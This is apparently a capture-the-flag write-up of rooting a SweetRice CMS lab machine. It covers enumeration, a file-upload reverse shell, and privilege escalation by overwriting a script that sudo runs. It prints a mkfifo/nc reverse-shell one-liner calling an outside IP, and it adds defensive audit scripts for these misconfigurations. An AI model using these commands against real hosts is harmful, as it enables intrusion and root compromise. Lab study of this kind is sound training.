Enumeration
┌──(root㉿kali)-[/home/local_host/Desktop/THM]
└─# nmap -sV 10.10.39.105
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-12 11:35 IST
Nmap scan report for 10.10.39.105
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds
Let's check out port 80.
We can see that it's the Apache2 Ubuntu default page, so let's discover directories with gobuster.
┌──(root㉿kali)-[/home/local_host/Desktop/THM]
└─# gobuster dir -u 10.10.39.105 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html -q
/.hta (Status: 403) [Size: 277]
/.hta.php (Status: 403) [Size: 277]
/.hta.txt (Status: 403) [Size: 277]
/.hta.html (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd.php (Status: 403) [Size: 277]
/.htaccess.php (Status: 403) [Size: 277]
/.htpasswd.txt (Status: 403) [Size: 277]
/.htaccess.txt (Status: 403) [Size: 277]
/.htpasswd.html (Status: 403) [Size: 277]
/.htaccess.html (Status: 403) [Size: 277]
/content (Status: 301) [Size: 314] [--> http://10.10.39.105/content/]
/index.html (Status: 200) [Size: 11321]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 277]
/content looks interesting.
There's a SweetRice notice.
Let's check the subdirectories of /content as well!!
┌──(root㉿kali)-[/home/local_host/Desktop/THM]
└─# gobuster dir -u 10.10.39.105/content -w /usr/share/wordlists/dirb/common.txt -x php,txt,html -q
/.hta (Status: 403) [Size: 277]
/.hta.php (Status: 403) [Size: 277]
/.hta.txt (Status: 403) [Size: 277]
/.hta.html (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess.txt (Status: 403) [Size: 277]
/.htpasswd.php (Status: 403) [Size: 277]
/.htaccess.html (Status: 403) [Size: 277]
/.htpasswd.txt (Status: 403) [Size: 277]
/.htaccess.php (Status: 403) [Size: 277]
/.htpasswd.html (Status: 403) [Size: 277]
/_themes (Status: 301) [Size: 322] [--> http://10.10.39.105/content/_themes/]
/as (Status: 301) [Size: 317] [--> http://10.10.39.105/content/as/]
/attachment (Status: 301) [Size: 325] [--> http://10.10.39.105/content/attachment/]
/changelog.txt (Status: 200) [Size: 18013]
/images (Status: 301) [Size: 321] [--> http://10.10.39.105/content/images/]
/inc (Status: 301) [Size: 318] [--> http://10.10.39.105/content/inc/]
/index.php (Status: 200) [Size: 2198]
/index.php (Status: 200) [Size: 2198]
/js (Status: 301) [Size: 317] [--> http://10.10.39.105/content/js/]
/license.txt (Status: 200) [Size: 15410]
changelog.txt:
#############################################
SweetRice - Simple Website Management System
Version 1.5.0
Author:Hiler Liu steelcal@gmail.com
Home page:http://www.basic-cms.org/
#############################################
New web - new SweetRice for both PC & mobile website creator,easy way to follow the new web world.
========================================
We can now conclude that the target machine is running SweetRice CMS v1.5.0. Let's search Exploit-DB.
Download and open the mysql_bakup_20191129023059-1.5.1.sql file.
We now have a username and a password hash. Let's crack the hash using hashcat.
We can now log in to the admin panel, as we have both the username and the password.
We have found that there is an Arbitrary File Upload vulnerability. We can exploit it to upload a reverse shell script and gain access to the target machine.
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ __ __________.__ |
| / _____/_ _ __ ____ _____/ |\______ \__| ____ ____ |
| \_____ \ \/ \/ // __ \_/ __ \ __\ _/ |/ ___\/ __ \ |
| / \ /\ ___/\ ___/| | | | \ \ \__\ ___/ |
|/_______ / \/\_/ \___ >\___ >__| |____|_ /__|\___ >___ > |
| \/ \/ \/ \/ \/ \/ |
| > SweetRice 1.5.1 Unrestricted File Upload |
| > Script Cod3r : Ehsan Hosseini |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
[+] Sending User&Pass...
[+] Login Succssfully...
[+] File Uploaded...
[+] URL : http://10.10.39.105/content/attachment/shell.php5
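Two of the web-side findings above, the SQL backup reachable under the web root and a `.php5` file accepted into `content/attachment/`, are things an administrator can check for from the server itself. The POSIX shell script below is an added example written for this page; it is not part of the original writeup or of SweetRice. The web root and upload directory in the usage line, the extension lists, and the sample files it is exercised against are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the writeup or SweetRice): audit a web root for
#  1. database dumps or backup archives reachable over HTTP, and
#  2. files in an upload directory whose extension Apache/PHP may execute.
# Paths and the extension lists below are assumptions for illustration.

# find_exposed_dumps WEBROOT
#   Prints backup-looking files under WEBROOT; returns 0 if any were found.
find_exposed_dumps() {
    find "$1" -type f \( -name '*.sql' -o -name '*.sql.gz' \
                         -o -name '*.bak' -o -name '*.tar.gz' \) -print | grep .
}

# risky_upload_name NAME
#   Returns 0 when NAME ends in an extension a default mod_php setup may run
#   (php, php3-php7, phtml, phar, phps) or is .htaccess, which can re-enable
#   PHP handling inside the upload directory. Comparison is case-insensitive.
risky_upload_name() {
    case "$(printf '%s' "$1" | tr 'A-Z' 'a-z')" in
        *.php|*.php[3-7]|*.phtml|*.phar|*.phps|*/.htaccess|.htaccess) return 0 ;;
    esac
    return 1
}

# find_risky_uploads UPLOAD_DIR
#   Prints every file in UPLOAD_DIR that risky_upload_name flags;
#   returns 0 if at least one was found, 1 otherwise.
find_risky_uploads() {
    found=1
    for f in $(find "$1" -type f); do          # assumes no spaces in names
        if risky_upload_name "$f"; then
            echo "$f"
            found=0
        fi
    done
    return $found
}

# Usage (assumed paths): sh webroot_audit.sh /var/www/html /var/www/html/content/attachment
if [ $# -eq 2 ]; then
    echo "== backup files under $1 =="
    find_exposed_dumps "$1"
    echo "== server-executable files under $2 =="
    find_risky_uploads "$2"
fi
```

The extension allowlist an upload handler should enforce is the inverse of `risky_upload_name`: accept only the types the feature needs (images, documents) and serve the upload directory with script execution disabled, so that a stray `.php5` or `.htaccess` is inert even if it does get written.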
❯ nc -nlvp 1234
Connection from 10.10.39.105:44046
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
09:34:23 up 33 min, 0 users, load average: 0.00, 0.01, 0.24
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
Let's navigate the file system to find user.txt.
$ cd /home
$ ls
itguy
$ cd itguy
$ ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backup.pl
examples.desktop
mysql_login.txt
user.txt
$ cat user.txt
THM{63e5bce927******************}
Privilege Escalation
$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
$ cat backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
The backup.pl script executes /etc/copy.sh!
$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
We can run this file as root (through backup.pl), so if we replace its contents with a reverse shell we can get root access to the target machine from our host machine.
$ echo 'php /var/www/html/content/attachment/shell.php5' > /etc/copy.sh
Now we have to run backup.pl as root.
$ sudo /usr/bin/perl /home/itguy/backup.pl
$ Successfully opened reverse shell to 10.17.15.106:1234
$ nc -nlvp 1234
Connection from 10.10.39.105:44052
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
09:46:00 up 44 min, 0 users, load average: 0,00, 0,00, 0,09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{6637f41d01***************}
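The root shell came from a chain of two files: sudo lets www-data run /home/itguy/backup.pl as root, and backup.pl in turn executes /etc/copy.sh, which a low-privileged user could overwrite. The POSIX shell script below is an added example written for this page, not part of the original writeup; it checks a sudo-permitted script and every quoted absolute path it executes for write access by group or other. The script path in the usage comment and the files the test creates are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the writeup): check whether a script that sudo lets
# a low-privileged user run as root, and the files that script in turn
# executes, can be modified by anyone other than their owner. This is the
# misconfiguration above: backup.pl runs as root, but the /etc/copy.sh it
# calls was writable by www-data. Paths in the usage comment are assumptions.

# writable_by_others FILE
#   Returns 0 when FILE is missing (a low-privileged user could create it) or
#   when its mode grants write to group or other; 1 otherwise.
writable_by_others() {
    [ -e "$1" ] || return 0
    mode=$(ls -ld "$1" | cut -c1-10)   # e.g. -rwxrwxrwx
    case "$mode" in
        ?????w*)    return 0 ;;        # group write bit set
        ????????w?) return 0 ;;        # other write bit set
    esac
    return 1
}

# audit_sudo_script SCRIPT
#   Checks SCRIPT itself plus every double-quoted absolute path inside it
#   (the system("sh", "/etc/copy.sh") pattern). Prints one RISK line per
#   problem and returns 1 if any was found, 0 if the chain looks safe.
audit_sudo_script() {
    script="$1"
    status=0
    for p in "$script" $(grep -o '"/[^"]*"' "$script" 2>/dev/null | tr -d '"'); do
        if writable_by_others "$p"; then
            echo "RISK: $p is run via $script but is writable by non-owners"
            status=1
        fi
    done
    return $status
}

# Usage (assumed path from the writeup):
#   sh sudo_target_audit.sh /home/itguy/backup.pl
if [ $# -gt 0 ]; then
    rc=0
    for s in "$@"; do
        audit_sudo_script "$s" || rc=1
    done
    exit $rc
fi
```

Run it against each command listed under NOPASSWD in `sudo -l`; a clean result only means the permission bits are right, so also confirm that the script and its targets are owned by root and live in directories that are not writable by the invoking user, since either would give the same outcome as the writable /etc/copy.sh here.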